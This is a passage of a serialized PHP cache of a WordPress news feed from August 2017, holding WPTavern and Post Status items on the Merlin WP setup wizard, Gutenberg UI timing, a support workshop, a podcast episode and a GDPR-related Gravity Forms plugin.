href="https://lorelle.wordpress.com/2015/01/24/welcome-to-lorelles-wordpress-school/" title="Welcome to Lorelle’s WordPress School « Lorelle on WordPress">Lorelle&#8217;s WordPress School Introduction</a></li>\n<li><a href="https://lorelle.wordpress.com/classes-and-workshops/wordpress-school/" title="WordPress School « Lorelle on WordPress">Lorelle&#8217;s WordPress School Description</a></li>\n<li><a href="https://lorelle.wordpress.com/classes-and-workshops/wordpress-school/tutorials/" title="Tutorials « Lorelle on WordPress">WordPress School Tutorials List</a></li>\n<li><a href="https://plus.google.com/u/0/communities/115251582756616355670" title="WordPress School Google+ Community">WordPress School Google+ Community</a></li>\n<li><a href="https://lorelle.wordpress.com/2015/01/12/wordpress-publishing-checklist/" title="WordPress Publishing Checklist">WordPress Publishing Checklist</a></li>\n<li><a href="https://lorelle.wordpress.com/classes-and-workshops/wordpress-school/feedback-and-criticism/" title="How to Give Feedback and Criticism - Lorelle\'s WordPress School.">How to Give Feedback and Criticism</a></li>\n</ul>\n<div class="sig">\n<p><img src="https://lorelle.files.wordpress.com/2006/08/sig.gif" alt="" /></p>\n<hr /> </div><br />Filed under: <a href="https://lorelle.wordpress.com/category/wordpress/">WordPress</a>, <a href="https://lorelle.wordpress.com/category/wordpress/wordpress-school-wordpress/">WordPress School</a> Tagged: <a href="https://lorelle.wordpress.com/tag/learn-wordpress/">learn wordpress</a>, <a href="https://lorelle.wordpress.com/tag/shortcodes/">shortcodes</a>, <a href="https://lorelle.wordpress.com/tag/wordpress-2/">wordpress</a>, <a href="https://lorelle.wordpress.com/tag/wordpress-guide/">wordpress guide</a>, <a href="https://lorelle.wordpress.com/tag/wordpress-help/">wordpress help</a>, <a href="https://lorelle.wordpress.com/tag/wordpress-news/">WordPress News</a>, <a href="https://lorelle.wordpress.com/tag/wordpress-school/">wordpress school</a>, <a href="https://lorelle.wordpress.com/tag/wordpress-shortcodes/">wordpress shortcodes</a>, <a href="https://lorelle.wordpress.com/tag/wordpress-tips/">WordPress Tips</a>, <a href="https://lorelle.wordpress.com/tag/wordpress-tutorials/">wordpress tutorials</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lorelle.wordpress.com/14325/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lorelle.wordpress.com/14325/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lorelle.wordpress.com/14325/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lorelle.wordpress.com/14325/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lorelle.wordpress.com/14325/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lorelle.wordpress.com/14325/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lorelle.wordpress.com/14325/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lorelle.wordpress.com/14325/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lorelle.wordpress.com/14325/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lorelle.wordpress.com/14325/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lorelle.wordpress.com/14325/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lorelle.wordpress.com/14325/" /></a> <img alt="" border="0" src="https://pixel.wp.com/b.gif?host=lorelle.wordpress.com&blog=72&post=14325&subd=lorelle&ref=&feed=1" width="1" height="1" />";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 18 Aug 2017 11:02:13 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:17:"Lorelle VanFossen";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:5;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:97:"WPTavern: New Merlin WP Onboarding Wizard Makes WordPress Theme Installation and Setup Effortless";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74230";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:108:"https://wptavern.com/new-merlin-wp-onboarding-wizard-makes-wordpress-theme-installation-and-setup-effortless";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:5189:"<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/08/merlin-wp.png?ssl=1"><img /></a></p>\n<p><a href="https://themebeans.com/" target="_blank">ThemeBeans</a> founder Rich Tabor released <a href="https://richtabor.com/merlin-wp/" target="_blank">Merlin WP</a> on <a href="https://github.com/richtabor/MerlinWP" target="_blank">GitHub</a> in public beta this week. The project provides a beautiful experience for installing and setting up WordPress themes with all of their plugin dependencies, Customizer settings, widgets, demo content, and more.</p>\n<p>&#8220;I was inspired by David Baker’s <a href="https://github.com/dtbaker/envato-wp-theme-setup-wizard" target="_blank">Envato Theme Setup Wizard</a> and was working to add it to my own themes but pivoted after realizing I was just putting a band-aid on the onboarding issues surrounding themes in particular,&#8221; Tabor said. &#8220;It wasn’t a particularly grand experience and didn’t take care of the essentials the way I was looking for.&#8221;</p>\n<p>Tabor said he wanted to make the onboarding experience much friendlier than what WordPress products are typically known for and needed a way to get his customers started on the right foot.</p>\n<p>&#8220;Over the years I’ve had countless &#8216;how do I get this page like your demo&#8217; and &#8216;where do I even start&#8217; questions — and my themes aren’t even particularly confusing/difficult to use.&#8221; Tabor said.</p>\n<p>Ordinarily, users have to hop from screen to screen to install a theme, recommended plugins, and apply Customizer settings. Even an experienced WordPress user often has to refer to documentation to get a theme set up with the right customizations to match the demo. The video below shows an example of Merlin WP in action as it guides a user through setting up <a href="https://themebeans.com/themes/york-pro" target="_blank">York Pro</a>, a fork of one of ThemeBeans&#8217; commercial themes that is included in Merlin WP&#8217;s GitHub repo.</p>\n<div class="embed-vimeo"></div>\n<p>Merlin WP makes the process of setting up a theme nearly effortless for users. It also leaves less room for error or confusion.</p>\n<p>Developers can add Merlin WP directly to their theme files. It includes a configuration file that allows for customization of any text string in the wizard. Theme developers add the Merlin class (merlin/merlin.php) and the merlin-config.php file, along with any demo content (included in the demo directory location specified in the merlin-config.php file):</p>\n<ul>\n<li><strong>content.xml</strong> — Exported demo content using the WordPress Exporter</li>\n<li><strong>widgets.wie</strong> — Exported widgets using Widget Importer and Exporter</li>\n<li><strong>customizer.dat</strong> — Exported Customizer settings using Customizer Export/Import</li>\n</ul>\n<p>Merlin WP was also developed to work seamlessly with <a href="http://tgmpluginactivation.com/" target="_blank">TGMPA</a>, a PHP library that many WordPress developers use to require or recommend plugins for their themes and plugins. It will automatically pull the recommended plugins into the wizard.</p>\n<p>Tabor said his targeted distribution channel is commercial themes, though he believes Merlin WP could also be useful for themes hosted on WordPress.org.</p>\n<p>&#8220;I’m honestly not sure if it would be allowed,&#8221; Tabor said. &#8220;I guess that’s where getting more eyes on the project and more input from the Theme Review team comes in handy. I have had a lot of feedback from authors who are eventually considering adding Merlin WP as an &#8216;up-sell feature&#8217; for their lite offerings currently on .org.&#8221;</p>\n<p>Tabor estimates that Merlin WP will be in beta for another two weeks. There are a few issues he wants to resolve before bringing it out of beta. He is testing the wizard in his own products at ThemeBeans, which is what he built it for originally. The shop has more than 40,000 customers and Tabor plans to push the wizard live across his entire theme collection once the last few issues are resolved.</p>\n<p>Merlin WP is GPL-licensed and <a href="https://github.com/richtabor/MerlinWP" target="_blank">available on GitHub</a> for any developer to use in open source projects. Tabor said he is considering creating a pro version but is not currently interested in pursuing an add-on model.</p>\n<p>&#8220;I&#8217;m considering having an advanced version, with different developer-level capabilities, such as EDD Software Licensing support (where theme users can enter their license key issued from the developer in the onboarding process),&#8221; Tabor said.</p>\n<p>Tabor anticipates one of the main benefits for theme shops using Merlin WP will be a decreased support load where questions about initial setup and &#8220;how do I do this like the demo&#8221; become less common.</p>\n<p>&#8220;Customers will have what they’ve purchased right off the bat (instead of installing plugins, installing a child theme, importing content, setting menus, widgets, etc),&#8221; Tabor said. &#8220;They will likely appreciate the ease-of-use and share that experience with others.&#8221;</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 18 Aug 2017 01:19:49 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:6;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:82:"Post Status: Building a healthy remote company, with Tom Willmot — Draft podcast";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:31:"https://poststatus.com/?p=38655";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:81:"https://poststatus.com/building-healthy-remote-company-tom-willmot-draft-podcast/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1876:"<p>Welcome to the Post Status <a href="https://poststatus.com/category/draft">Draft podcast</a>, which you can find <a href="https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008">on iTunes</a>, <a href="https://play.google.com/music/m/Ih5egfxskgcec4qadr3f4zfpzzm?t=Post_Status__Draft_WordPress_Podcast">Google Play</a>, <a href="http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast">Stitcher</a>, and <a href="http://simplecast.fm/podcasts/1061/rss">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Brian Krogsgard.</p>\n<p>In this episode, Brian is joined by Tom Willmot, the CEO of Human Made. Human Made recently released <a href="https://handbook.hmn.md/">an employee handbook</a> as an open source document for anyone to use, copy, or learn from. Tom and Brian discuss several elements of the handbook, and how they approach these things at Human Made:</p>\n<ul>\n<li>Employee onboarding</li>\n<li>Remote work processes</li>\n<li>Communication</li>\n<li>Employee feedback and mentorship</li>\n<li>HR policies</li>\n<li>And more!</li>\n</ul>\n<p>This was a fun episode. Human Made has some of the lowest turnover in our industry and it was educational to hear from Tom.</p>\n<!--[if lt IE 9]><script>document.createElement(\'audio\');</script><![endif]-->\n<a href="https://audio.simplecast.com/a0dd5349.mp3">https://audio.simplecast.com/a0dd5349.mp3</a>\n<p><a href="https://audio.simplecast.com/a0dd5349.mp3">Direct Download</a></p>\n<h3>Sponsor: OptinMonster</h3>\n<p><a href="http://optinmonster.com">OptinMonster</a> allows you to convert visitors into subscribers. You can easily create &amp; A/B test beautiful lead capture forms without a developer. Be sure to check out their new <a href="http://optinmonster.com/announcing-the-inactivitysensor-activity-logs-and-more/">Inactivity Sensor</a> technology.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 18 Aug 2017 01:19:30 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:14:"Katie Richards";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:7;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:93:"WPTavern: User Experience Tests Show Gutenberg’s UI Elements Can Benefit From Better Timing";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74274";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:101:"https://wptavern.com/user-experience-tests-show-gutenbergs-ui-elements-can-benefit-from-better-timing";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2703:"<p>Over the past few months, <a href="https://wordpress.org/support/plugin/gutenberg/reviews/">reviews for Gutenberg</a> have trended towards a love/hate relationship without much in between. To figure out why this is, Millie Macdonald and Anna Harrison of Ephox, the company behind TinyMCE, <a href="https://go.tinymce.com/blog/gutenberg-editor-success-lies-timing/">analyzed the feedback</a> and concluded that many of the issues likely stem from timing.</p>\n<p>&#8220;In short, the nuances in the micro-interactions and timing of UI elements in Gutenberg are a little out of sync with what the user is doing at a point in time,&#8221; Harrison said. &#8220;For example, a user typing in a new paragraph is distracted when the decoration of the previous paragraph turns on.&#8221;</p>\n<p>A common piece of feedback is that Gutenberg&#8217;s UI is clean but also cluttered. Harrison recorded a video of users copying and pasting paragraphs into Gutenberg and Medium.</p>\n<p>In the video, toolbars and UI elements are displayed in Gutenberg during the writing process creating a cluttered look and disrupting the writing flow. In Medium, the formatting toolbar doesn&#8217;t display until text is highlighted and the + symbol disappears if it&#8217;s not interacted with.</p>\n<p></p>\n<p>Based on user testing, Harrison suggests refining the timing of when visual elements pop up in Gutenberg. &#8220;Right now, menus pop up when we are trying to type,&#8221; Harrison said. &#8220;They ought to pop up when we are trying to do something to words that have already been typed.&#8221;</p>\n<p>Harrison <a href="https://github.com/WordPress/gutenberg/issues/2279">presented their findings</a> and suggestions to Gutenberg&#8217;s development team. Tammie Lister, design lead for Gutenberg, <a href="https://github.com/WordPress/gutenberg/issues/2279#issuecomment-321379994">agreed</a> that getting micro-transactions right is important. &#8220;I see this as the type of refinement post version 0.9/1 can bring,&#8221; Lister said.</p>\n<p>&#8220;A few things I am slightly obsessed with is having an animation pace, story and consistency to interactions. Just something to throw in when looking at micro-interactions. I&#8217;ve also been doing some self thinking about what the &#8216;feel&#8217; of emotion of Gutenberg should be. The one I keep coming back to is &#8216;calm&#8217; and &#8216;supporting&#8217;. Just another thing to throw in when looking at these smaller details.&#8221;</p>\n<p>Developers thanked Harrison and Macdonald for collecting, analyzing, and sharing data with the team. Does Gutenberg feel heavy to you? Let us know what your experience is like writing content in Gutenberg.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 17 Aug 2017 23:06:27 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:8;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:85:"WPTavern: WordPress Support Team to Host Free Workshop August 23 on Supporting Themes";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74257";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:96:"https://wptavern.com/wordpress-support-team-to-host-free-workshop-august-23-on-supporting-themes";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3074:"<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2015/04/colored-pencils.jpg?ssl=1"><img /></a></p>\n<p>Over the past few months the WordPress Support Team has been brainstorming ways to improve support across various aspects of the community. One new idea they are pursuing is <a href="https://make.wordpress.org/support/2017/07/the-developers-guide-to-supporting-your-themes-a-support-workshop/" target="_blank">hosting workshops</a> where WordPress.org theme and plugin authors can present how they approach supporting their free, open source products that have been released to the community.</p>\n<p>Some users approach WordPress.org plugins and themes with realistic expectations regarding the support they might receive on tickets. Others approach these free products as if they were all built with large teams of professional support behind them, which is rarely the case. This often results in frustration, one-star reviews, and ultimately a bad reputation for products hosted in the official directories. It is also one of the primary reasons developers forgo putting products on WordPress.org and simply opt to host them on GitHub.</p>\n<p>The new workshops will offer concrete strategies for bridging the chasm of expectation regarding support that exists between developers and users. WordPress.org theme and plugin authors will share the tools and ideas they have implemented to offer support while creating a positive experience for everyone involved.</p>\n<p><a href="https://kpresner.com/" target="_blank">Kathryn Presner</a>, who supports hundreds of themes at Automattic, will be leading the first workshop titled &#8220;The Developers Guide to Supporting Your Themes:&#8221;</p>\n<blockquote><p>Providing support for your themes offers tremendous opportunities to educate WordPress users, from explaining how to make a child theme to offering simple CSS customisations. It also presents challenges, like figuring out how to help people who aren’t tech-savvy or need support beyond the scope of what you can provide. While many developers dread doing support, with some concrete strategies and techniques in hand, helping users doesn’t have to be a chore – and can even be fun! This session looks at how to make your themes’ users happy while feeling a sense of satisfaction from your own support efforts – a winning combination in the world of theme development.</p></blockquote>\n<p>WordPress.org theme authors will want to mark their calendars for <a href="http://www.timeanddate.com/worldclock/fixedtime.html?iso=20170823T1600" target="_blank">Wednesday, August 23 at 11 AM CDT</a>. The workshop will be broadcast live as a Zoom teleconference and will last for an hour, including time for a Q&amp;A at the end. Zoom can <a href="https://support.zoom.us/hc/en-us/articles/201362023-System-Requirements-for-PC-Mac-and-Linux" target="_blank">run on desktop</a> and also offers <a href="https://zoom.us/download" target="_blank">apps for mobile devices</a>. The session will be recorded and available on WordPress.tv at a later date.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 17 Aug 2017 19:19:26 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:9;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:66:"WPTavern: WPWeekly Episode 285 – Not Every WordPress Is the Same";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:58:"https://wptavern.com?p=74233&preview=true&preview_id=74233";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:73:"https://wptavern.com/wpweekly-episode-285-not-every-wordpress-is-the-same";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2894:"<p>In this episode, <a href="https://jjj.blog/">John James Jacoby</a> and I open the show by discussing our observations of social media lately. Our feeds are filled with anger and for me personally, Twitter is becoming less useful.</p>\n<p>We discussed the news of the week, including a lengthy conversation about Automattic opening up the WordPress.org ecosystem of plugins and themes to Business plan customers. Near the end of the episode, we share the features we&#8217;d like to see in a syntax highlighter for the built-in plugin and theme editors.</p>\n<h2>Stories Discussed:</h2>\n<p><a href="https://wptavern.com/wordpress-foundation-to-sponsor-open-source-educational-events">WordPress Foundation to Sponsor Open Source Educational Events</a></p>\n<p><a href="https://wptavern.com/woocommerce-forks-select2-releases-selectwoo-as-a-drop-in-replacement-with-improved-accessibility">WooCommerce Forks select2, Releases selectWoo as a Drop-In Replacement with Improved Accessibility</a></p>\n<p><a href="https://wptavern.com/gutenberg-0-8-0-introduces-5-new-blocks-categories-text-columns-shortcode-audio-and-video">Gutenberg 0.8.0 Introduces 5 New Blocks: Categories, Text Columns, Shortcode, Audio, and Video</a></p>\n<p><a href="https://wptavern.com/wordpress-coms-business-plan-gives-subscribers-a-way-to-tap-into-wordpress-orgs-third-party-ecosystem">WordPress.com’s Business Plan Gives Subscribers a Way to Tap into WordPress.org’s Third-party Ecosystem</a></p>\n<p><a href="https://wptavern.com/wordpress-4-9-to-focus-on-code-editing-and-customization-improvements-targeted-for-november-14">WordPress 4.9 to Focus on Code Editing and Customization Improvements, Targeted for November 14</a></p>\n<h2>Picks of the Week:</h2>\n<p><a href="https://wpisnotwp.com/">WPisNotWP</a> by Caspar Hübinger, is a tiny progressive web app that outlines the differences between WordPress the open-source project and WordPress.com. Contributions to the app can be made on the <a href="https://github.com/glueckpress/wpistnotwp.com">project&#8217;s GitHub page</a>.</p>\n<p>A deep dive into the WordPress user roles and capabilities API by John Blackbourn.</p>\n<div class="embed-wrap"></div>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, August 23rd 3:00 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href="https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738" target="_blank" rel="noopener">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href="https://wptavern.com/feed/podcast" target="_blank" rel="noopener">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href="http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr" target="_blank" rel="noopener">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #285:</strong><br />\n</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 16 Aug 2017 23:55:22 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:10;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:90:"WPTavern: Gravity Forms Stop Entries Plugin Aims to Help Sites Comply with the EU’s GDPR";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74189";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:98:"https://wptavern.com/gravity-forms-stop-entries-plugin-aims-to-help-sites-comply-with-the-eus-gdpr";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:10232:"<a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2017/08/steaming-mailbox.png?ssl=1"><img /></a>photo credit: <a href="https://stocksnap.io/photo/NRB5T25KRG">AJ Montpetit</a>\n<p><a href="https://wordpress.org/plugins/wider-gravity-forms-stop-entries/" target="_blank">Wider Gravity Forms Stop Entries</a> is a new plugin that helps website owners protect the privacy of form submissions by preventing entries from being stored in the database. The plugin was created by UK-based web developer <a href="https://jonnya.net/" target="_blank">Jonny Allbut</a> for internal use at <a href="https://wider.co.uk/" target="_blank">Wider</a>, a company he set up for handling WordPress clients&#8217; needs.</p>\n<p>One aspect of complying with the EU&#8217;s <a href="http://www.eugdpr.org/" target="_blank">General Data Protection Regulation</a> (GDPR) is ensuring that contact forms do not store any personally identifiable data on the server. The regulation becomes enforceable in May 2018 and sites that serve EU citizens are preparing for the deadline with audits and changes to how they handle privacy.</p>\n<p><a href="http://www.gravityforms.com/" target="_blank">Gravity Forms</a> doesn&#8217;t offer a built-in option to stop entries from being stored on the server but GF co-founder Carl Hancock says there are a variety of ways to accomplish this.</p>\n<p>&#8220;If all you want to do is simply email the contents of the form and not store the data in the database as part of the route you&#8217;d like to take for GDPR compliance, this plugin would be one method of doing so,&#8221; Hancock said. He also referenced Gravity Wiz&#8217;s commercial <a href="https://gravitywiz.com/documentation/gravity-forms-disable-entry-creation/" target="_blank">Disable Entry Creation</a> plugin. Developers can also <a href="https://www.gravityhelp.com/documentation/article/delete-entry-data-after-submission/" target="_blank">delete entry data after submission</a> via a hook.</p>\n<p>&#8220;However, the GDPR doesn&#8217;t preclude storing form entries in a database and is entirely dependent on the type of data you are storing and the other safeguards and functionality you have put in place,&#8221; Hancock said. &#8220;It&#8217;s a complex issue and I&#8217;m not entirely sure the EU fully understands the burden and implications that may come with it.&#8221;</p>\n<p>Ultimately, the requirement of compliance falls upon website administrators who are the ones collecting the data. It is their responsibility to select tools that will protect their users&#8217; privacy.</p>\n<p>&#8220;While it won’t provide GDPR compliance on its own, Jonny’s extension is a much-needed step in the right direction,&#8221; digital law specialist <a href="https://webdevlaw.uk" target="_blank">Heather Burns</a> said. Burns consults with companies that need assistance in getting their sites GDPR compliant. &#8220;GDPR requires adherence to the <a href="https://www.smashingmagazine.com/2017/07/privacy-by-design-framework/" target="_blank">principles of privacy by design</a> and part of that is data minimization and deletion.&#8221;</p>\n<p>WordPress has dozens of popular contact form plugins, both free and commercial. Many of them store entries in the database in case the recipient&#8217;s email has problems, preventing the communication from becoming lost. Site administrators who are concerned about GDPR compliance will want to examine the solution they have selected for forms. Burns advised that contact form plugins need to do the following three things:</p>\n<ul>\n<li>Ensure that personal and sensitive personal data from form entries is not stored in the database;</li>\n<li>Provide configuration options to allow contact form entries to be automatically deleted after a certain period of time;</li>\n<li>Ensure that all contact form data is deleted when the plugin is deactivated or deleted.</li>\n</ul>\n<p>&#8220;Unfortunately the direction of travel has been the exact opposite: contact form entries tend to be stored in perpetuity on the database regardless of content or necessity,&#8221; Burns said. &#8220;Contact form plugins with options to automatically delete form submissions after a certain period of time are rare. I&#8217;ve even seen contact form extensions which duplicate entries to a separate table, which, all things considered, is madness. We need to be developing towards data minimization and deletion, not retention and duplication.&#8221;</p>\n<p>Last month JJ Jay <a href="https://tharshetests.wordpress.com/2017/06/19/wp-contact-form-remnants/" target="_blank">published</a> an analysis of how and where popular WordPress contact forms plugins store data. This is a 